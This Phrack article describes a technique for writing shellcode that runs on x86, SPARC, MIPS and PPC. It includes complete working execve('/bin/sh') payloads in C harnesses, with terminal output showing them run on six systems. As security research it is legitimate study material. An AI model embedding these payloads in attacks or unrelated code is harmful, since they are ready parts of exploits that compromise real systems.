==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x0e of 0x12 |=---------------=[ Architecture Spanning Shellcode ]=-------------------=| |=-----------------------------------------------------------------------=| |=--------------------=[ eugene@gravitino.net ]=-------------------------=| Introduction ------------ At defcon8 caezar's challenge 4 party [1] a problem was present to write a shellcode that would run on two or more processor platforms. Below you will find my solution (don't forget to check the credits section). The general idea behind an architecture spanning shellcode is trying to come up with a sequence of bytes that would execute a jump instruction on one architecture while executing a nop-like instruction on another architecture. That way we can branch to architecture specific code depending on the platform our code is running on. Here is an ASCII representation of our byte stream: XXX arch1 shellcode arch2 shellcode where XXX is a sequence of bytes that is going to branch to arch2's shellcode on architecture 2 and is going to fall through to arch1 shellcode on architecture 1. If we want to add more platforms we would need to add additional jump/nop instructions for each additional platform. MIPS architecture ------------------ A brief introduction to the MIPS architecture and writing MIPS shellcode was described by scut in phrack 56 [2] as well as by the LSD folks in their paper [8]. The only thing that is worse repeating here is the general MIPS instruction format. All MIPS instructions occupy 32 bits and the sixth most significant bits specify the instruction opcode [6][7]. There are 3 instruction formats: I-Type (immediate), J-Type (Jump) and R-Type (Register). Since we are looking for a nop-like instructions we are mostly interesting in I and R type instructions whose format is listed below. I-Type instruction format: 31 30 29 28 27 26|25 24 23 22 21| 20 19 18 17 16| 15 .. 0 op | rs | rt | immediate fields are: op 6-bit operation code rs 5-bit source register specifier rt 5-bit target (src/dest) or branch condition immediate 16-bit immediate, branch or address displacement R-Type instruction format: 31 30 29 28 27 26|25 24 23 22 21| 20 19 18 17 16| 15 14 131211|109876|5..0 op | rs | rt | rd | shamt|funct fields are: op 6-bit operation code rs 5-bit source register specifier rt 5-bit target (src/dest) or branch condition rd 5-bit destination register specifier shamt 5-bit shift amount funct 6-bit function field Sparc architecture ------------------ Similarly to MIPS, Sparc is a RISC based architecture. All the Sparc instructions occupy 32 bits and the two most significant bits specify an instruction class [4]: op Instruction Class 00 Branch instructions 01 call instruction 10 Format Three instructions (type 1) 11 Format Three instructions (type 2) Format one call instruction contains an op field '01' followed by 30 bits of address. Even though this is the optimal instruction to use, since we control 30 bits out of 32, we won't be able to use it since the jumps are not relative and tend to have 0 bytes in them. Format three instructions (type 2) are mostly load/store instructions which are mostly useless to us since we are only looking for relatively harmless nop-like instructions. We definitely don't want to use anything that has possibility of crashing our program (SIGSEGV in case of an illegal load/store). This leaves us with branch and format three instructions (type 1) to use. Here is the format of a format three instruction: 31 30 |29 28 27 26 25|24 23 22 21 20 19|18 17 16 15 14|13|12 11 10 9 8 7..0 op | rd | op3 | rs1 |01| rs2 / imm fields are: op 2-bit instruction class (10) rd 5-bit destination register specifier op3 5-bit instruction specifier rs1 5-bit source register 0/1 1-bit constant / second source register option rs2 / imm 13-bit specifies either a second source register or a constant Some of the promising looking (harmless) format three instructions are add, and, or, xor and sll/srl (specified by op3 bits). And here is the branch instruction format: 31 30 |29|28 27 26 25|24 23 22|21 .. 0 op |a | condition | op2 |displacement fields are: op 2-bit instruction class (00) a 1-bit annulled flag condition 5-bit condition specifier.. ba, bn, bl, ble, be, etc op2 3-bit condition code (integer condition code is 010) displacement 22-bit address displacement As you can see, a lot of the fields already have predefined values which we need to work around. PPC architecture ---------------- PowerPC is yet another RISC architecture used by vendors such as IBM and Apple. See LSD's paper [8] for more information. x86 architecture ---------------- The topic of buffer overflows and shellcode on x86 architecture has been beaten to death before. For a good introduction see Aleph1's article in phrack 49 [3]. To expand just a little bit on the topic I am going to present x86 code that works on multiple x86 operating systems. The idea behind an "OS spanning" shellcode is to setup all the registers and stack in such a way as to satisfy the requirements of all the operating systems that our shellcode is meant to execute on. For example, BSD passes its parameters on stack while Linux uses registers (for passing arguments to syscalls). If we setup both registers and stack than our code would run on both BSD and Linux x86 systems. The only problem with writing shellcode for BSD & Linux systems is the different execve() syscall numbers the two systems use. Linux uses syscall number 0xb while BSD uses 0x3b. To overcome this problem, we need to distinguish between the two systems at runtime. There are plenty of ways to do that such as checking where various segments are mapped, the way segment registers are setup, etc. I chose to analyze the segment registers since that method seems to be pretty robust. On Linux systems, for example, segment registers fs and gs are set 0 (in user mode) while on BSD systems they are set to non zero values (0x1f on OpenBSD, 0x2f on FreeBSD). We can exploit that difference to distinguish between the two different systems. See "Adding more architectures" section for a working example. Another way to to handle different syscall numbers is to ignore an "invalid system call" SIGSYS signal and just try a different syscall number if the first execve() call failed. While that method certainly works it is quite limited and cannot be applied to other operating systems such as the x86 Solaris which doesn't use the 0x80 interrupt trap gate. Note that the "OS Spanning" shellcode is certainly not restricted to an x86 platform, the same idea can be applied to any hardware platform and any operating system. Putting it all together.. Architecture spanning shellcode --------------------------------------------------------- As I have mentioned before our shellcode (first attempt) is going to look like XXX arch1 shellcode arch2 shellcode where XXX is a specially crafted string that executes different instructions on two different platforms. When I initially started looking for a working XXX string, I took an x86 short jump instruction and tried to decode it on a sun box. Since the first byte of an x86 short jump instruction is 0xEB (which is almost all 1's) [5], the instruction decoded into a weird format 3 sparc instruction. My next attempt consisted of writing a sparc jump instruction and trying to decode it on an x86 platform. That idea almost worked but i was unable to decode the sparc jump instruction into a nop-like x86 xor instruction due to a one bit offset difference. The next attempt consisted of padding an x86 jump instruction. Since an x86 short jump instruction is 2 bytes long and all the sparc instructions are 4 bytes long, I had 2 bytes to play with. I knew that I had to insert some bytes before the jump 0xEB byte in order to be able to decode the instruction into something reasonable on sparc. For my pad bytes I chose to use the x86 0x90 nop bytes which turned out to be a good idea since 0x90 is mostly all 0's. My instruction stream than looked like \x90\x90\xeb\x30 where 0x90 is the x86 nop instruction, 0xEB is the opcode for an x86 short jump and 0x30 is a 48 byte jump offset. Here is what the above string decoded to on a Sun machine: (gdb) x 0x1054c 0x1054c : 0x9090eb30 (gdb) x/t 0x1054c 0x1054c : 10010000100100001110101100110000 (gdb) x/i 0x1054c 0x1054c : orcc %g3, 0xb30, %o0 As you can see, our string decoded to a harmless format 3 'or' instruction that corrupted the %o0 register. This is exactly what we were looking for, a short jump on one architecture (x86) and a harmless instruction on another architecture (sparc). With that in mind our shellcode now looks like this: \x90\x90\xeb\x30 [sparc shellcode] [x86 shellcode] Let's try it out.. [openbsd]$ cat ass.c ; ass as in Architecture Spanning Shellcode :) char sc[] = /* magic string */ "\x90\x90\xeb\x30" /* sparc solaris execve() */ "\x2d\x0b\xd8\x9a" /* sethi $0xbd89a, %l6 */ "\xac\x15\xa1\x6e" /* or %l6, 0x16e, %l6 */ "\x2f\x0b\xdc\xda" /* sethi $0xbdcda, %l7 */ "\x90\x0b\x80\x0e" /* and %sp, %sp, %o0 */ "\x92\x03\xa0\x08" /* add %sp, 8, %o1 */ "\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */ "\x9c\x03\xa0\x10" /* add %sp, 0x10, %sp */ "\xec\x3b\xbf\xf0" /* std %l6, [%sp - 0x10] */ "\xdc\x23\xbf\xf8" /* st %sp, [%sp - 0x08] */ "\xc0\x23\xbf\xfc" /* st %g0, [%sp - 0x04] */ "\x82\x10\x20\x3b" /* mov $0x3b, %g1 */ "\x91\xd0\x20\x08" /* ta 8 */ /* BSD execve() */ "\xeb\x17" /* jmp */ "\x5e" /* pop %esi */ "\x31\xc0" /* xor %eax, %eax */ "\x50" /* push %eax */ "\x88\x46\x07" /* mov %al,0x7(%esi) */ "\x89\x46\x0c" /* mov %eax,0xc(%esi) */ "\x89\x76\x08" /* mov %esi,0x8(%esi) */ "\x8d\x5e\x08" /* lea 0x8(%esi),%ebx */ "\x53" /* push %ebx */ "\x56" /* push %esi */ "\x50" /* push %eax */ "\xb0\x3b" /* mov $0x3b, %al */ "\xcd\x80" /* int $0x80 */ "\xe8\xe4\xff\xff\xff" /* call */ "\x2f\x62\x69\x6e\x2f\x73\x68"; /* /bin/sh */ int main(void) { void (*f)(void) = (void (*)(void)) sc; f(); return 0; } [openbsd]$ gcc ass.c [openbsd]$ ./a.out $ uname -ms OpenBSD i386 [solaris]$ gcc ass.c [solaris]$ ./a.out $ uname -ms SunOS sun4u it worked! Adding more architectures ------------------------- Theoretically, spanning shellcode is not tied to any specific operating system nor any specific hardware architecture. Thus it should be possible to write shellcode that runs on more than two architectures. The format for our shellcode (second attempt) that runs on 3 architectures is going to be XXX YYY arch1 shellcode arch2 shellcode arch3 shellcode where arch1 is MIPS, arch2 is Sparc and arch3 is x86. My first attempt was to try and reuse the magic string from ass.c. Unfortunately, 0x9090eb30 didn't decode into anything reasonable on an IRIX platform and so I was forced to look elsewhere. My next attempt was to replace 0x90 bytes with some other nop-like bytes looking for a sequence that would work on both Sparc & MIPS platforms. After a trying out a bunch of x86 nop instructions from K2's ADMmutate toolkit, I stumbled upon an AAA instruction whose opcode was 0x37. The AAA instruction worked out great since the 0x3737eb30 string decoded correctly on all three platforms: x86: aaa aaa jmp +120 sparc: sethi %hi(0xdFADE000), %i3 mips: ori $s7,$t9,0xeb78 with XXX string out of the way, I was left with MIPS and Sparc platforms YYY part. The very first instruction I tried worked on both platforms. The instruction was a Sparc annulled short jump ba,a (0x30800012) which decoded to andi $zero,$a0,0x12 on a MIPS platform. Not only did the jump instruction decoded to a harmless 'andi' on a MIPS platform, it also didn't require a branch delay slot instruction after it since the ba jump was annulled [4]. So now our shellcode looks like this "\x37\x37\xeb\x78" /* x86: aaa; aaa; jmp 116+4 */ /* MIPS: ori $s7,$t9,0xeb78 */ /* Sparc: sethi %hi(0xdfade000),%i3*/ "\x30\x80\x00\x12" /* MIPS: andi $zero,$a0,0x12 */ /* Sparc: ba,a +72 */ [snip real shellcode] While we are adding more architectures to our shellcode let's also take a look at PPC/AIX. The first logical thing to do is to try and decode the existing XXX and YYY strings from the above shellcode on the PPC platform: (gdb) x 0x10000364 0x10000364 : 0x3737eb78 (gdb) x/i 0x10000364 0x10000364 : addic. r25,r23,-5256 (gdb) x/x 0x10000368 0x10000368 : 0x30800012 (gdb) x/i 0x10000368 0x10000368 : addic r4,r0,18 is this our lucky day or what? the XXX and YYY strings from the above MIPS/x86/Sparc combo have correctly decoded to two harmless add instructions. All we need to do now is to come up with another instruction that is going to execute a jump on a MIPS platform while executing a nop on PPC/AIX. After a bit of searching MIPS 'bgtz' instruction turned out to decode into a valid multiply instruction on AIX: [MIPS] (gdb) x 0x10001008 0x10001008 : 0x1ee00101 (gdb) x/i 0x10001008 0x10001008 : bgtz $s7,0x10001410 <+1040> [AIX] (gdb) x 0x10000378 0x10000378 : 0x1ee00101 (gdb) x/i 0x10000378 0x10000378 : mulli r23,r0,257 the bgtz instruction is a branch on greater than zero [7]. Notice that the branch instruction uses the $s7 register which was modified by us in a previous nop instruction. The branch displacement is set to 0x0101 (to avoid NULL bytes in the instruction) which is equivalent to a relative 1028 byte forward jump. Let's put everything together now.. [openbsd]$ cat ass.c /* * Architecture/OS Spanning Shellcode * * runs on x86 (freebsd, netbsd, openbsd, linux), MIPS/Irix, Sparc/Solaris * and PPC/AIX (AIX platforms require -DAIX compiler flag) * * eugene@gravitino.net */ char sc[] = /* voodoo */ "\x37\x37\xeb\x7b" /* x86: aaa; aaa; jmp 116+4 */ /* MIPS: ori $s7,$t9,0xeb7b */ /* Sparc: sethi %hi(0xdFADEc00), %i3 */ /* PPC/AIX: addic. r25,r23,-5253 */ "\x30\x80\x01\x14" /* MIPS: andi $zero,$a0,0x114 */ /* Sparc: ba,a +1104 */ /* PPC/AIX: addic r4,r0,276 */ "\x1e\xe0\x01\x01" /* MIPS: bgtz $s7, +1032 */ /* PPC/AIX: mulli r23,r0,257 */ "\x30\x80\x01\x14" /* fill in the MIPS branch delay slot with the above MIPS / AIX nop */ /* PPC/AIX shellcode by LAST STAGE OF DELIRIUM *://lsd-pl.net/ */ "\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */ "\x40\x82\xff\xfd" /* bnel */ "\x7e\xa8\x02\xa6" /* mflr r21 */ "\x3a\xc0\x01\xff" /* lil r22,0x1ff */ "\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */ "\x7e\xb5\xba\x14" /* cax r21,r21,r23 */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "\x04\x82\x53\x71" "\x87\xa0\x89\xfc" "\x69\x68\x67\x65" "\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */ "\x44\xff\xff\x02" /* svca 0x0 */ "\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */ "\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */ "\x40\x82\xff\xfd" /* bnel */ "\x7f\xe8\x02\xa6" /* mflr r31 */ "\x3b\xff\x01\x20" /* cal r31,0x120(r31) */ "\x38\x7f\xff\x08" /* cal r3,-248(r31) */ "\x38\x9f\xff\x10" /* cal r4,-240(r31) */ "\x90\x7f\xff\x10" /* st r3,-240(r31) */ "\x90\xbf\xff\x14" /* st r5,-236(r31) */ "\x88\x55\xff\xf4" /* lbz r2,-12(r21) */ "\x98\xbf\xff\x0f" /* stb r5,-241(r31) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "/bin/sh" /* x86 BSD/Linux execve() by me */ "\xeb\x29" /* jmp */ "\x5e" /* pop %esi */ "\x31\xc0" /* xor %eax, %eax */ "\x50" /* push %eax */ "\x88\x46\x07" /* mov %al,0x7(%esi) */ "\x89\x46\x0c" /* mov %eax,0xc(%esi) */ "\x89\x76\x08" /* mov %esi,0x8(%esi) */ "\x8d\x5e\x08" /* lea 0x8(%esi),%ebx */ "\x53" /* push %ebx */ "\x56" /* push %esi */ "\x50" /* push %eax */ /* setup registers for linux */ "\x8d\x4e\x08" /* lea 0x8(%esi),%ecx */ "\x8d\x56\x08" /* lea 0x8(%esi),%edx */ "\x89\xf3" /* mov %esi, %ebx */ /* distinguish between BSD & Linux */ "\x8c\xe0" /* movl %fs, %eax */ "\x21\xc0" /* andl %eax, %eax */ "\x74\x04" /* jz +4 */ "\xb0\x3b" /* mov $0x3b, %al */ "\xeb\x02" /* jmp +2 */ "\xb0\x0b" /* mov $0xb, %al */ "\xcd\x80" /* int $0x80 */ "\xe8\xd2\xff\xff\xff" /* call */ "\x2f\x62\x69\x6e" /* /bin */ "\x2f\x73\x68" /* /sh */ /* * pad the MIPS/Irix & Sparc/Solaris shellcodes * jumps of > 0x0101 bytes are performed on both platforms * to avoid NULL bytes in the jump instructions */ "2359595912811011811145128130124118116118121114127231291301241171" "2911813245571341291181211101231241181291101234512913012411712911" "8132455712712412112411245123118120128451291301241171291181324512" "9128118133114451141004559113130110111451141171294511512445134129" "1301101141112311411712945571171121291181321284511411712945113123" "1104512312412712911211412111445114117129451151244511312112712413" "2451141171294559595913212412345113121127124132451271301244512811" "8451281181179797117118128451181284512413012745132124127121113451" "2312413259595945129117114451321241271211134512411545129117114451" "1412111411212912712412345110123113451291171144512813211812911211" "7574512911711423111114110130129134451241154512911711445111110130" "1135945100114451141331181281294513211812911712413012945128120118" "1234511212412112412757451321181291171241301294512311012911812412" "31101211181291345745132118" /* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso */ "\xaf\xa0\xff\xfc" /* sw $zero, -4($sp) */ "\x24\x06\x73\x50" /* li $a2, 0x7350 */ "\x04\xd0\xff\xff" /* bltzal $a2, dpatch */ "\x8f\xa6\xff\xfc" /* lw $a2, -4($sp) */ /* a2 = (char **) envp = NULL */ "\x24\x0f\xff\xcb" /* li $t7, -53 */ "\x01\xe0\x78\x27" /* nor $t7, $t7, $zero */ "\x03\xef\xf8\x21" /* addu $ra, $ra, $t7 */ /* a0 = (char *) pathname */ "\x23\xe4\xff\xf8" /* addi $a0, $ra, -8 */ /* fix 0x42 dummy byte in pathname to shell */ "\x8f\xed\xff\xfc" /* lw $t5, -4($ra) */ "\x25\xad\xff\xbe" /* addiu $t5, $t5, -66 */ "\xaf\xed\xff\xfc" /* sw $t5, -4($ra) */ /* a1 = (char **) argv */ "\xaf\xa4\xff\xf8" /* sw $a0, -8($sp) */ "\x27\xa5\xff\xf8" /* addiu $a1, $sp, -8 */ "\x24\x02\x04\x23" /* li $v0, 1059 (SYS_execve) */ "\x01\x01\x01\x0c" /* syscall */ "\x2f\x62\x69\x6e" /* .ascii "/bin" */ "\x2f\x73\x68\x42" /* .ascii "/sh", .byte 0xdummy */ /* Sparc Solaris execve() by an unknown author */ "\x2d\x0b\xd8\x9a" /* sethi $0xbd89a, %l6 */ "\xac\x15\xa1\x6e" /* or %l6, 0x16e, %l6 */ "\x2f\x0b\xdc\xda" /* sethi $0xbdcda, %l7 */ "\x90\x0b\x80\x0e" /* and %sp, %sp, %o0 */ "\x92\x03\xa0\x08" /* add %sp, 8, %o1 */ "\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */ "\x9c\x03\xa0\x10" /* add %sp, 0x10, %sp */ "\xec\x3b\xbf\xf0" /* std %l6, [%sp - 0x10] */ "\xdc\x23\xbf\xf8" /* st %sp, [%sp - 0x08] */ "\xc0\x23\xbf\xfc" /* st %g0, [%sp - 0x04] */ "\x82\x10\x20\x3b" /* mov $0x3b, %g1 */ "\x91\xd0\x20\x08" /* ta 8 */ ; int main(void) { #if defined(AIX) /* copyright LAST STAGE OF DELIRIUM feb 2001 poland */ int jump[2]={(int)sc,*((int*)&main+1)}; ((*(void (*)())jump)()); #else void (*f)(void) = (void (*)(void)) sc; f(); #endif return 0; } [openbsd]$ gcc ass.c [openbsd]$ ./a.out $ uname -ms OpenBSD i386 [freebsd]$ gcc ass.c [freebsd]$ ./a.out $ uname -ms FreeBSD i386 [linux]$ gcc ass.c [linux]$ ./a.out $ uname -ms Linux i686 [solaris]$ gcc ass.c [solaris]$ ./a.out $ uname -ms SunOS sun4u [irix]$ gcc ass.c [irix]$ ./a.out $ uname -ms IRIX IP22 [aix]$ gcc ass.c [aix]$ ./a.out $ uname -ms AIX 000089101000 Conclusion ----------- Architecture spanning shellcode is a specially crafted code that executes differently depending on the architecture it is being run on. The code achieves that by using a series of bytes which execute differently on different architectures. OS spanning shellcode is specially crafted code that executes on multiple operating systems all running on the same platform. The code achieves that by setting up the registers and the stack in a way that satisfies the operating systems that the code is being run on. Credits / Thanks ---------------- Greg Hoglund working with me on this idea at the challenge party prole and harm for coming with an idea way before the challenge http://www.redgeek.net/~prole/ASSC.txt gravitino.net, GHI, skyper, spoonm References ---------- [1] Caezar's challenge http://www.caezarschallenge.org [2] Writing MIPS/IRIX shellcode scut (phrack 56) [3] Smashing The Stack For Fun And Profit Aleph One (phrack 49) [4] SPARC Architecture, Assembly Language Programming, and C. 2nd ed. Richard P. Paul [5] IA-32 Intel Architecture, Software Developer's Manual Intel, Corp http://developer.intel.com [6] Computer Organization and Design David A. Patterson and John L. Hennessy [7] MIPS RISC Architecture Gerry Kane and Joe Heinrich [8] UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes The Last Stage of Delirium Research Group http://lsd-pl.net |=[ EOF ]=---------------------------------------------------------------=|